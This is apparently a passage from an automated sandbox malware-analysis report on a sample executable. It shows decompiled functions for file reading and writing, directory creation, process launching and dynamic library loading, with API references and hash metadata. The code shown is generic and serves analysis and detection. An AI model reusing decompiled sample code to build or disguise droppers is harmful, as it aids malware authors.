				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x00403375
0x0040337e
0x00403387
0x0040338b
0x00403396
0x00403396
0x0040339e
0x004033a5
0x004033b7
0x004033be
0x00403463
0x00403463
0x00000000
0x004033c4
0x004033c7
0x004033d3
0x004033d7
0x00403471
0x00403471
0x004033dd
0x004033e0
0x0040343f
0x00403445
0x00403447
0x00403447
0x00403459
0x00403461
0x00403468
0x0040346b
0x00000000
0x00000000
0x00000000
0x00000000
0x004033e2
0x004033e5
0x00000000
0x004033eb
0x004033f0
0x004033f7
0x004033fa
0x004033fc
0x004033fc
0x00403409
0x0040340c
0x00403413
0x00000000
0x00000000
0x0040341c
0x00403423
0x0040343b
0x00403465
0x00403465
0x00403425
0x00403425
0x00403428
0x0040342b
0x00403431
0x00403437
0x00000000
0x00403439
0x00000000
0x00403439
0x00403437
0x00000000
0x00403423
0x00000000
0x004033f0
0x004033e5
0x004033e0
0x004033d7
0x004033be
0x00403473
0x00403476

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(0x436000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560,00000000), ref: 00405FF0
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC

SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405c54
0x00405c74
0x00405c7c
0x00405c81
0x00000000
0x00405c87
0x00405c8b

APIs

CreateProcessW.KERNELBASE ref: 00405C74
CloseHandle.KERNEL32(?), ref: 00405C81

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78

Uniqueness

Uniqueness Score: -1.00%

Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406a3d
0x00406a40
0x00406a47
0x00406a4f
0x00406a5b
0x00000000
0x00406a62
0x00406a52
0x00406a59
0x00000000
0x00406a6a
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79

Uniqueness

Uniqueness Score: -1.00%

Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x0040615c
0x00406169
0x0040617e
0x00406184

APIs

GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\xeWd55M5Lb.exe,80000000,00000003), ref: 0040615C
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}

0x00406138
0x0040613e
0x00406143
0x0040614c
0x0040614c
0x00406155

APIs

GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405c1c
0x00405c24
0x00000000
0x00405c2a
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
GetLastError.KERNEL32 ref: 00405C2A

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D

Uniqueness

Uniqueness Score: -1.00%

Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x0040620e
0x0040621e
0x00406226
0x00000000
0x0040622d
0x00000000
0x0040622f

APIs

WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040DBF9,0040CEF0,00403579,0040CEF0,0040DBF9,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5

Uniqueness

Uniqueness Score: -1.00%

Function 004061DB Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004061df
0x004061ef
0x004061f7
0x00000000
0x004061fe
0x00000000
0x00406200

APIs

ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8

Uniqueness

Uniqueness Score: -1.00%

Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403606
0x0040360c

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
